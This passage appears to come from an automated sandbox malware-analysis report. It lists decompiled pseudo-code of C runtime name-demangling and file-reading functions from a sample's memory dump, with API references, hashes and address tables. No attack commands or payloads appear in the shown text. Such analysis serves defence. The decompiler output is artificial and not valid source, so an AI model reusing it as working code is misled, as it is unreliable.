                                                                                              • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000), ref: 0135196C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01351975
                                                                                              • IsTextUnicode.ADVAPI32(?,?), ref: 013519AF
                                                                                              • SendMessageW.USER32(00000147,00000000,00000000), ref: 013519E8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01351A0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMessageSend$CloseHandle$CreateItemParentReadSizeTextUnicode
                                                                                              • String ID:
                                                                                              • API String ID: 1432465751-0
                                                                                              • Opcode ID: a1b3658958353229842a5af26cd1ce0560f3b66255087b29b0f22644bf4028d8
                                                                                              • Instruction ID: 4f7e5c6fde9b1bceeb1d3af4df2701873ff871d8e3dc8631f8165dba92fcfe10
                                                                                              • Opcode Fuzzy Hash: a1b3658958353229842a5af26cd1ce0560f3b66255087b29b0f22644bf4028d8
                                                                                              • Instruction Fuzzy Hash: DF410371604340BBE7765B28CC49FBA7BECEB84B14F104A1CFA86D61D5D7B54980CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135C1FB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E0135C1FB(void* __edx, void* __edi, void* __fp0, char* _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char* _v48;
				char _v56;
				char _v64;
				void* __ebx;
				void* __esi;
				signed int _t51;
				char** _t57;
				char* _t58;
				char** _t60;
				char* _t66;
				char** _t78;
				signed int* _t79;
				signed int* _t80;
				char* _t84;
				char _t85;
				char* _t116;
				signed int _t119;

				_t115 = __edi;
				_t114 = __edx;
				_t51 =  *0x139e210; // 0xbb40e64e
				_v8 = _t51 ^ _t119;
				_t84 = _a4;
				_t118 =  *0x13a0b18;
				_v48 = _t84;
				_t85 =  *_t118;
				_t54 = _t85 + 0xffffffd0;
				_v33 = _t85;
				if(_t85 + 0xffffffd0 > 9) {
					_push(__edi);
					if(_t85 != 0x3f) {
						if(E0135B5EC(_t118, "template-parameter-", 0x13) != 0) {
							if(E0135B5EC(_t118, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t57 = E0135B7A6( &_v56, 0x13a0b18, 0x40);
									L20:
									_t84 = _t57[1];
									_t116 =  *_t57;
								} else {
									_t116 = 0;
									_t118 =  &(_t118[0]);
									_t84 = 0;
									 *0x13a0b18 = _t118;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t118 =  &(_t118[3]);
							_v28 = 0xe;
							L9:
							 *0x13a0b18 = _t118;
							E0135D268(_t114,  &_v44);
							if(( *0x13a0b20 & 0x00004000) == 0 ||  *0x13a0b28 == 0) {
								E0135BB4B(E0135B77F( &_v56,  &_v32),  &_v32,  &_v44);
								_t66 =  &_v64;
								goto L14;
							} else {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								E0135BAA7( &_v44,  &_v24, 0x10);
								_t118 =  *0x13a0b28;
								 *0x13a2000(E0138291F(_t114,  &_v24,  &_v24));
								if( *( *0x13a0b28)() == 0) {
									E0135BB4B(E0135B77F( &_v64,  &_v32),  &_v32,  &_v44);
									_t66 =  &_v56;
									L14:
									_t57 = E0135BB6D( &_v32, _t66, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t57 = E01361CB8( &_v44, _t73);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t118 =  &(_t118[4]);
						_v28 = 0x14;
						goto L9;
					} else {
						_t78 = E0135D966(_t84, __edx, __edi, _t118, __fp0,  &_v44, 0);
						_t116 =  *_t78;
						_t84 = _t78[1];
						_t79 =  *0x13a0b18;
						_v32 = _t116;
						_v28 = _t84;
						_t80 =  &(_t79[0]);
						 *0x13a0b18 = _t80;
						if( *_t79 != 0x40) {
							_t81 = _t80 - 1;
							 *0x13a0b18 = _t80 - 1;
							E0135BDFB( &_v32, (0 |  *_t81 != 0x00000000) + 1);
							_t84 = _v28;
							_t116 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t118 =  *0x13a0b10;
							if( *_t118 != 9 && _t116 != 0) {
								_t60 = E0135B660(0x13a0b34, 8);
								if(_t60 != 0) {
									 *_t60 = _t116;
									_t60[1] = _t84;
									 *_t118 =  *_t118 + 1;
									 *(_t118 + 4 +  *_t118 * 4) = _t60;
								}
							}
						}
						_t58 = _v48;
						 *_t58 = _t116;
						_t58[4] = _t84;
						_pop(_t115);
						goto L27;
					}
				} else {
					 *0x13a0b18 = _t118;
					E0135BF23( *0x13a0b10, _t84, _t54);
					_t58 = _t84;
					L27:
					return L01353E0D(_t58, _t84, _v8 ^ _t119, _t114, _t115, _t118);
				}
			}


























                                                                                              0x0135c1fb
                                                                                              0x0135c1fb
                                                                                              0x0135c201
                                                                                              0x0135c208
                                                                                              0x0135c20c
                                                                                              0x0135c210
                                                                                              0x0135c216
                                                                                              0x0135c219
                                                                                              0x0135c21e
                                                                                              0x0135c221
                                                                                              0x0135c227
                                                                                              0x0135c244
                                                                                              0x0135c248
                                                                                              0x0135c2ac
                                                                                              0x0135c2d3
                                                                                              0x0135c3a7
                                                                                              0x0135c3c6
                                                                                              0x0135c3cb
                                                                                              0x0135c3cb
                                                                                              0x0135c3ce
                                                                                              0x0135c3af
                                                                                              0x0135c3af
                                                                                              0x0135c3b1
                                                                                              0x0135c3b2
                                                                                              0x0135c3b4
                                                                                              0x0135c3b4
                                                                                              0x00000000
                                                                                              0x0135c3a7
                                                                                              0x0135c2d9
                                                                                              0x0135c2e0
                                                                                              0x0135c2e3
                                                                                              0x0135c2ea
                                                                                              0x0135c2ed
                                                                                              0x0135c2f4
                                                                                              0x0135c304
                                                                                              0x0135c399
                                                                                              0x0135c39e
                                                                                              0x00000000
                                                                                              0x0135c30f
                                                                                              0x0135c314
                                                                                              0x0135c31a
                                                                                              0x0135c31b
                                                                                              0x0135c31c
                                                                                              0x0135c321
                                                                                              0x0135c326
                                                                                              0x0135c339
                                                                                              0x0135c344
                                                                                              0x0135c36e
                                                                                              0x0135c373
                                                                                              0x0135c376
                                                                                              0x0135c37c
                                                                                              0x00000000
                                                                                              0x0135c37c
                                                                                              0x0135c346
                                                                                              0x0135c34d
                                                                                              0x0135c351
                                                                                              0x00000000
                                                                                              0x0135c351
                                                                                              0x0135c304
                                                                                              0x0135c2ae
                                                                                              0x0135c2b5
                                                                                              0x0135c2b8
                                                                                              0x00000000
                                                                                              0x0135c24a
                                                                                              0x0135c250
                                                                                              0x0135c257
                                                                                              0x0135c259
                                                                                              0x0135c25c
                                                                                              0x0135c261
                                                                                              0x0135c264
                                                                                              0x0135c269
                                                                                              0x0135c26a
                                                                                              0x0135c272
                                                                                              0x0135c278
                                                                                              0x0135c27b
                                                                                              0x0135c28a
                                                                                              0x0135c28f
                                                                                              0x0135c292
                                                                                              0x0135c292
                                                                                              0x0135c3d0
                                                                                              0x0135c3d4
                                                                                              0x0135c3d6
                                                                                              0x0135c3df
                                                                                              0x0135c3ec
                                                                                              0x0135c3f3
                                                                                              0x0135c3f5
                                                                                              0x0135c3f7
                                                                                              0x0135c3fa
                                                                                              0x0135c3fe
                                                                                              0x0135c3fe
                                                                                              0x0135c3f3
                                                                                              0x0135c3df
                                                                                              0x0135c402
                                                                                              0x0135c405
                                                                                              0x0135c407
                                                                                              0x0135c40a
                                                                                              0x00000000
                                                                                              0x0135c40a
                                                                                              0x0135c229
                                                                                              0x0135c232
                                                                                              0x0135c238
                                                                                              0x0135c23d
                                                                                              0x0135c40b
                                                                                              0x0135c418
                                                                                              0x0135c418

                                                                                              APIs
                                                                                              • Replicator::operator[].LIBCMT ref: 0135C238
                                                                                              • DName::operator=.LIBVCRUNTIME ref: 0135C28A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator=Replicator::operator[]
                                                                                              • String ID: @$generic-type-$template-parameter-
                                                                                              • API String ID: 3211817929-1320211309
                                                                                              • Opcode ID: 45fbf2365ef54813b385b78ae248d5cf8ecd17afdc182beb6b9b180644fdea1b
                                                                                              • Instruction ID: a1d68c6ab17568e4278e2106e3204570f48f7836ad8ebf5231b96754005d89a9
                                                                                              • Opcode Fuzzy Hash: 45fbf2365ef54813b385b78ae248d5cf8ecd17afdc182beb6b9b180644fdea1b
                                                                                              • Instruction Fuzzy Hash: F361BFB1D0030D9BDB59DFA8D451EEEFBBDAF1870CF444059EA02A7291D7749A05CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135DC76 Relevance: 15.3, APIs: 10, Instructions: 301COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 79%
                                                                                              			E0135DC76(void* __fp0, intOrPtr _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				wchar_t** _v32;
				char _v36;
				char _v40;
				char _v48;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t65;
				signed int* _t67;
				signed int _t68;
				void* _t69;
				signed int _t76;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				signed int _t108;
				void* _t110;
				void* _t112;
				void* _t119;
				void* _t122;
				intOrPtr _t126;
				signed int _t152;
				void* _t153;
				void* _t154;
				signed int _t155;
				signed int _t156;
				void* _t157;
				void* _t158;

				_t166 = __fp0;
				_t65 =  *0x139e210; // 0xbb40e64e
				_v8 = _t65 ^ _t156;
				_t67 =  *0x13a0b18;
				_t126 = _a4;
				_t152 =  &(_t67[0]);
				_t155 =  *_t67;
				_t68 = _t155;
				 *0x13a0b18 = _t152;
				_v28 = _t155;
				_push(_t153);
				_t157 = _t68 - 0x46;
				if(_t157 > 0) {
					_t69 = _t68 - 0x47;
					__eflags = _t69 - 0xf;
					if(_t69 > 0xf) {
						goto L66;
					} else {
						switch( *((intOrPtr*)(( *(_t69 + 0x135e03e) & 0x000000ff) * 4 +  &M0135E01E))) {
							case 0:
								goto L34;
							case 1:
								 &_v32 = E0135E04E(__edx, __edi, __esi, __fp0,  &_v32);
								__eflags = _v28 - 1;
								if(_v28 > 1) {
									goto L66;
								} else {
									__eax = E0135DC76(__fp0, __ebx);
									goto L11;
								}
								goto L68;
							case 2:
								_v32 = "nullptr";
								_v28 = 7;
								goto L16;
							case 3:
								 &_v48 = E0135D2B9(__edx,  &_v48, 0);
								_pop(__ecx);
								_pop(__ecx);
								_v32 = "lambda";
								_v28 = 6;
								goto L16;
							case 4:
								goto L66;
							case 5:
								 &_v40 = E0135D268(__edx,  &_v40);
								__eax = 0;
								__edi =  &_v24;
								asm("stosd");
								_pop(__ecx);
								__ecx =  &_v40;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								 &_v24 = E0135BAA7( &_v40,  &_v24, 0x10);
								__eax =  &_v24;
								__eax = E0138291F(__edx, __edi,  &_v24);
								__eflags =  *0x13a0b20 & 0x00004000;
								__esi = __eax;
								if(( *0x13a0b20 & 0x00004000) == 0) {
									L53:
									__esi = __esi & 0x00000fff;
									 &_v24 = swprintf( &_v24, 0x10, "%d", __esi);
									_v36 = 0;
									__eax =  &_v24;
									__ecx =  &_v40;
									_push(_v36);
									E01361CB8(__ecx,  &_v24) = _v28;
									__eax = _v28 - 0x52;
									__eflags = __eax;
									if(__eax == 0) {
										L61:
										_v32 = "`template-type-parameter-";
										goto L60;
									} else {
										__eax = __eax - 1;
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax == 0) {
											goto L61;
										} else {
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												_v32 = "`generic-class-parameter-";
												L60:
												_v28 = 0x19;
												goto L58;
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax != 0) {
													goto L66;
												} else {
													_v32 = "`generic-method-parameter-";
													_v28 = 0x1a;
													L58:
													__eax =  &_v32;
													__ecx =  &_v48;
													__eax = E0135B77F( &_v48,  &_v32);
													 &_v40 =  &_v32;
													__ecx = __eax;
													__eax = E0135BB4B(__ecx,  &_v32,  &_v40);
													_push(0x27);
													goto L47;
												}
											}
										}
									}
								} else {
									__edi =  *0x13a0b28;
									__eflags = __edi;
									if(__edi == 0) {
										goto L53;
									} else {
										__eax = __eax & 0x00000fff;
										__ecx = __edi;
										_push(__eax);
										__eax =  *0x13a2000();
										__eax =  *__edi();
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											goto L53;
										} else {
											_v36 = 0;
											__ecx = __ebx;
											_push(_v36);
											__eax = E01361CB8(__ecx, __eax);
										}
									}
								}
								goto L68;
							case 6:
								__ecx = 0;
								 *__ebx = 0;
								 *((intOrPtr*)(__ebx + 4)) = 0;
								goto L68;
						}
					}
				} else {
					if(_t157 == 0) {
						L34:
						_v32 = 0;
						_v28 = 0;
						L0135BE9C( &_v32, 0x7b);
						_t76 = _t155 - 0x48;
						__eflags = _t76;
						if(__eflags == 0) {
							L37:
							_push( &_v40);
							E0135BD24( &_v32, L0135BF5F(_t126, _t153, _t155, __eflags, _t166));
							E0135BBD3( &_v32, 0x2c);
						} else {
							_t93 = _t76 - 1;
							__eflags = _t93;
							if(__eflags == 0) {
								goto L37;
							} else {
								__eflags = _t93 - 1;
								if(__eflags == 0) {
									goto L37;
								}
							}
						}
						_t155 = _t155 - 0x46;
						__eflags = _t155;
						if(_t155 == 0) {
							L44:
							E0135BD24( &_v32, E0135D268(_t152,  &_v40));
							E0135BBD3( &_v32, 0x2c);
							goto L45;
						} else {
							_t155 = _t155 - 1;
							__eflags = _t155;
							if(_t155 == 0) {
								L43:
								E0135BD24( &_v32, E0135D268(_t152,  &_v40));
								E0135BBD3( &_v32, 0x2c);
								goto L44;
							} else {
								_t155 = _t155 - 1;
								__eflags = _t155;
								if(_t155 == 0) {
									L45:
									E0135BD24( &_v32, E0135D268(_t152,  &_v40));
								} else {
									_t155 = _t155 - 1;
									__eflags = _t155;
									if(_t155 == 0) {
										goto L44;
									} else {
										_t155 = _t155 - 1;
										__eflags = _t155;
										if(_t155 == 0) {
											goto L43;
										}
									}
								}
							}
						}
						_push(0x7d);
						L47:
						_push(_t126);
						E0135BB6D( &_v32);
					} else {
						_t158 = _t68 - 0x36;
						if(_t158 > 0) {
							_t95 = _t68 - 0x37;
							__eflags = _t95;
							if(_t95 == 0) {
								E0135D7A1(_t152, _t153, _t155, __fp0, _t126);
								goto L11;
							} else {
								_t97 = _t95 - 1;
								__eflags = _t97;
								if(_t97 == 0) {
									E0135D848(_t152, _t153, __fp0, _t126);
									goto L11;
								} else {
									_t99 = _t97 - 9;
									__eflags = _t99;
									if(_t99 == 0) {
										L29:
										E0135D3C7(_t152, _t126, _t155);
										goto L11;
									} else {
										_t101 = _t99 - 1;
										__eflags = _t101;
										if(_t101 == 0) {
											goto L29;
										} else {
											_t102 = _t101 - 1;
											__eflags = _t102;
											if(_t102 == 0) {
												E0135D72D(__fp0, _t126);
												goto L11;
											} else {
												__eflags = _t102;
												if(__eflags != 0) {
													goto L66;
												} else {
													_push(_t126);
													L0135BF5F(_t126, _t153, _t155, __eflags, __fp0);
													goto L11;
												}
											}
										}
									}
								}
							}
						} else {
							if(_t158 == 0) {
								E0135D6BD(_t152, _t153, __fp0, _t126);
								goto L11;
							} else {
								_t108 = _t68;
								if(_t108 == 0) {
									_t13 = _t152 - 1; // 0x23
									 *0x13a0b18 = _t13;
									_push(1);
									goto L67;
								} else {
									_t110 = _t108 - 0x30;
									if(_t110 == 0) {
										E0135D268(_t152, _t126);
										goto L11;
									} else {
										_t112 = _t110 - 1;
										if(_t112 == 0) {
											__eflags =  *_t152 - 0x40;
											if( *_t152 != 0x40) {
												_v32 = 0;
												_v28 = 0;
												L0135BE9C( &_v32, 0x26);
												_push( &_v40);
												E0135BB4B( &_v32, _t126, L0135BF5F(_t126, _t153, _t155, __eflags, __fp0));
											} else {
												_t152 = _t152 + 1;
												__eflags = _t152;
												_v32 = "NULL";
												 *0x13a0b18 = _t152;
												_v28 = 4;
												L16:
												E0135B77F(_t126,  &_v32);
											}
										} else {
											_t119 = _t112 - 1;
											if(_t119 == 0) {
												E0135D485(_t152, _t153, _t155, __fp0, _t126);
												goto L11;
											} else {
												_t122 = _t119;
												if(_t122 == 0) {
													E0135D60A(_t126);
													goto L11;
												} else {
													if(_t122 != 1) {
														L66:
														_push(2);
														L67:
														E0135B826(_t126);
													} else {
														E0135D655(__fp0, _t126);
														L11:
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L68:
				_pop(_t154);
				return L01353E0D(_t126, _t126, _v8 ^ _t156, _t152, _t154, _t155);
			}






































                                                                                              0x0135dc76
                                                                                              0x0135dc7c
                                                                                              0x0135dc83
                                                                                              0x0135dc86
                                                                                              0x0135dc8c
                                                                                              0x0135dc92
                                                                                              0x0135dc95
                                                                                              0x0135dc98
                                                                                              0x0135dc9a
                                                                                              0x0135dca0
                                                                                              0x0135dca3
                                                                                              0x0135dca4
                                                                                              0x0135dca7
                                                                                              0x0135dddb
                                                                                              0x0135ddde
                                                                                              0x0135dde1
                                                                                              0x00000000
                                                                                              0x0135dde7
                                                                                              0x0135ddee
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dfb9
                                                                                              0x0135dfbe
                                                                                              0x0135dfc3
                                                                                              0x00000000
                                                                                              0x0135dfc5
                                                                                              0x0135dfc6
                                                                                              0x00000000
                                                                                              0x0135dfc6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dfd0
                                                                                              0x0135dfd7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dfe9
                                                                                              0x0135dfee
                                                                                              0x0135dfef
                                                                                              0x0135dff0
                                                                                              0x0135dff7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135debb
                                                                                              0x0135dec0
                                                                                              0x0135dec2
                                                                                              0x0135dec5
                                                                                              0x0135dec6
                                                                                              0x0135dec9
                                                                                              0x0135decc
                                                                                              0x0135decd
                                                                                              0x0135dece
                                                                                              0x0135ded3
                                                                                              0x0135ded8
                                                                                              0x0135dedc
                                                                                              0x0135dee1
                                                                                              0x0135deeb
                                                                                              0x0135deee
                                                                                              0x0135df23
                                                                                              0x0135df23
                                                                                              0x0135df35
                                                                                              0x0135df3d
                                                                                              0x0135df41
                                                                                              0x0135df44
                                                                                              0x0135df47
                                                                                              0x0135df50
                                                                                              0x0135df53
                                                                                              0x0135df53
                                                                                              0x0135df56
                                                                                              0x0135dfac
                                                                                              0x0135dfac
                                                                                              0x00000000
                                                                                              0x0135df58
                                                                                              0x0135df58
                                                                                              0x0135df59
                                                                                              0x0135df59
                                                                                              0x0135df5c
                                                                                              0x00000000
                                                                                              0x0135df5e
                                                                                              0x0135df5e
                                                                                              0x0135df5e
                                                                                              0x0135df61
                                                                                              0x0135df9c
                                                                                              0x0135dfa3
                                                                                              0x0135dfa3
                                                                                              0x00000000
                                                                                              0x0135df63
                                                                                              0x0135df63
                                                                                              0x0135df63
                                                                                              0x0135df66
                                                                                              0x00000000
                                                                                              0x0135df6c
                                                                                              0x0135df6c
                                                                                              0x0135df73
                                                                                              0x0135df7a
                                                                                              0x0135df7a
                                                                                              0x0135df7e
                                                                                              0x0135df81
                                                                                              0x0135df8a
                                                                                              0x0135df8e
                                                                                              0x0135df90
                                                                                              0x0135df95
                                                                                              0x00000000
                                                                                              0x0135df95
                                                                                              0x0135df66
                                                                                              0x0135df61
                                                                                              0x0135df5c
                                                                                              0x0135def0
                                                                                              0x0135def0
                                                                                              0x0135def6
                                                                                              0x0135def8
                                                                                              0x00000000
                                                                                              0x0135defa
                                                                                              0x0135defa
                                                                                              0x0135deff
                                                                                              0x0135df01
                                                                                              0x0135df02
                                                                                              0x0135df08
                                                                                              0x0135df0a
                                                                                              0x0135df0b
                                                                                              0x0135df0d
                                                                                              0x00000000
                                                                                              0x0135df0f
                                                                                              0x0135df0f
                                                                                              0x0135df13
                                                                                              0x0135df15
                                                                                              0x0135df19
                                                                                              0x0135df19
                                                                                              0x0135df0d
                                                                                              0x0135def8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135deab
                                                                                              0x0135dead
                                                                                              0x0135deaf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135ddee
                                                                                              0x0135dcad
                                                                                              0x0135dcad
                                                                                              0x0135ddf5
                                                                                              0x0135ddf7
                                                                                              0x0135ddfa
                                                                                              0x0135de02
                                                                                              0x0135de09
                                                                                              0x0135de09
                                                                                              0x0135de0c
                                                                                              0x0135de18
                                                                                              0x0135de1b
                                                                                              0x0135de26
                                                                                              0x0135de30
                                                                                              0x0135de0e
                                                                                              0x0135de0e
                                                                                              0x0135de0e
                                                                                              0x0135de11
                                                                                              0x00000000
                                                                                              0x0135de13
                                                                                              0x0135de13
                                                                                              0x0135de16
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135de16
                                                                                              0x0135de11
                                                                                              0x0135de35
                                                                                              0x0135de35
                                                                                              0x0135de38
                                                                                              0x0135de6b
                                                                                              0x0135de79
                                                                                              0x0135de83
                                                                                              0x00000000
                                                                                              0x0135de3a
                                                                                              0x0135de3a
                                                                                              0x0135de3a
                                                                                              0x0135de3d
                                                                                              0x0135de4e
                                                                                              0x0135de5c
                                                                                              0x0135de66
                                                                                              0x00000000
                                                                                              0x0135de3f
                                                                                              0x0135de3f
                                                                                              0x0135de3f
                                                                                              0x0135de42
                                                                                              0x0135de88
                                                                                              0x0135de96
                                                                                              0x0135de44
                                                                                              0x0135de44
                                                                                              0x0135de44
                                                                                              0x0135de47
                                                                                              0x00000000
                                                                                              0x0135de49
                                                                                              0x0135de49
                                                                                              0x0135de49
                                                                                              0x0135de4c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135de4c
                                                                                              0x0135de47
                                                                                              0x0135de42
                                                                                              0x0135de3d
                                                                                              0x0135de9b
                                                                                              0x0135de9d
                                                                                              0x0135de9d
                                                                                              0x0135dea1
                                                                                              0x0135dcb3
                                                                                              0x0135dcb3
                                                                                              0x0135dcb6
                                                                                              0x0135dd7f
                                                                                              0x0135dd7f
                                                                                              0x0135dd82
                                                                                              0x0135ddd1
                                                                                              0x00000000
                                                                                              0x0135dd84
                                                                                              0x0135dd84
                                                                                              0x0135dd84
                                                                                              0x0135dd87
                                                                                              0x0135ddc6
                                                                                              0x00000000
                                                                                              0x0135dd89
                                                                                              0x0135dd89
                                                                                              0x0135dd89
                                                                                              0x0135dd8c
                                                                                              0x0135ddb8
                                                                                              0x0135ddba
                                                                                              0x00000000
                                                                                              0x0135dd8e
                                                                                              0x0135dd8e
                                                                                              0x0135dd8e
                                                                                              0x0135dd91
                                                                                              0x00000000
                                                                                              0x0135dd93
                                                                                              0x0135dd93
                                                                                              0x0135dd93
                                                                                              0x0135dd96
                                                                                              0x0135ddae
                                                                                              0x00000000
                                                                                              0x0135dd98
                                                                                              0x0135dd99
                                                                                              0x0135dd9c
                                                                                              0x00000000
                                                                                              0x0135dda2
                                                                                              0x0135dda2
                                                                                              0x0135dda3
                                                                                              0x00000000
                                                                                              0x0135dda3
                                                                                              0x0135dd9c
                                                                                              0x0135dd96
                                                                                              0x0135dd91
                                                                                              0x0135dd8c
                                                                                              0x0135dd87
                                                                                              0x0135dcbc
                                                                                              0x0135dcbc
                                                                                              0x0135dd75
                                                                                              0x00000000
                                                                                              0x0135dcc2
                                                                                              0x0135dcc4
                                                                                              0x0135dcc6
                                                                                              0x0135dd65
                                                                                              0x0135dd68
                                                                                              0x0135dd6d
                                                                                              0x00000000
                                                                                              0x0135dccc
                                                                                              0x0135dccc
                                                                                              0x0135dccf
                                                                                              0x0135dd5e
                                                                                              0x00000000
                                                                                              0x0135dcd5
                                                                                              0x0135dcd5
                                                                                              0x0135dcd8
                                                                                              0x0135dd0a
                                                                                              0x0135dd0d
                                                                                              0x0135dd34
                                                                                              0x0135dd37
                                                                                              0x0135dd3f
                                                                                              0x0135dd47
                                                                                              0x0135dd53
                                                                                              0x0135dd0f
                                                                                              0x0135dd0f
                                                                                              0x0135dd0f
                                                                                              0x0135dd10
                                                                                              0x0135dd17
                                                                                              0x0135dd1d
                                                                                              0x0135dd24
                                                                                              0x0135dd2a
                                                                                              0x0135dd2a
                                                                                              0x0135dcda
                                                                                              0x0135dcda
                                                                                              0x0135dcdd
                                                                                              0x0135dd03
                                                                                              0x00000000
                                                                                              0x0135dcdf
                                                                                              0x0135dce0
                                                                                              0x0135dce3
                                                                                              0x0135dcfb
                                                                                              0x00000000
                                                                                              0x0135dce5
                                                                                              0x0135dce8
                                                                                              0x0135e003
                                                                                              0x0135e003
                                                                                              0x0135e005
                                                                                              0x0135e007
                                                                                              0x0135dcee
                                                                                              0x0135dcef
                                                                                              0x0135dcf4
                                                                                              0x0135dcf4
                                                                                              0x0135dce8
                                                                                              0x0135dce3
                                                                                              0x0135dcdd
                                                                                              0x0135dcd8
                                                                                              0x0135dccf
                                                                                              0x0135dcc6
                                                                                              0x0135dcbc
                                                                                              0x0135dcb6
                                                                                              0x0135dcad
                                                                                              0x0135e00c
                                                                                              0x0135e011
                                                                                              0x0135e01c

                                                                                              APIs
                                                                                              • DName::operator+.LIBCMT ref: 0135DD53
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DD5E
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DE52
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DE6F
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DE8C
                                                                                              • DName::operator+.LIBCMT ref: 0135DEA1
                                                                                              • UnDecorator::getSignedDimension.LIBCMT ref: 0135DEBB
                                                                                              • swprintf.LIBCMT ref: 0135DF35
                                                                                              • DName::operator+.LIBCMT ref: 0135DF90
                                                                                                • Part of subcall function 0135D655: DName::DName.LIBVCRUNTIME ref: 0135D6B3
                                                                                              • DName::DName.LIBVCRUNTIME ref: 0135E007
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3689813335-0
                                                                                              • Opcode ID: e1fe9c7e89f64e908de514f461f04c3d1775cab1c90a2711afb512217a92b93a
                                                                                              • Instruction ID: 485c69668255d1036d418a3f3b839200f01bfb82c7f7f9878d637502986b33c5
                                                                                              • Opcode Fuzzy Hash: e1fe9c7e89f64e908de514f461f04c3d1775cab1c90a2711afb512217a92b93a
                                                                                              • Instruction Fuzzy Hash: AEA18671D0420F9ADB98EFFCD988EFEBBBCAF14A0CF500115DD05A6594DA749608CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013836B1 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 99%
                                                                                              			E013836B1(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
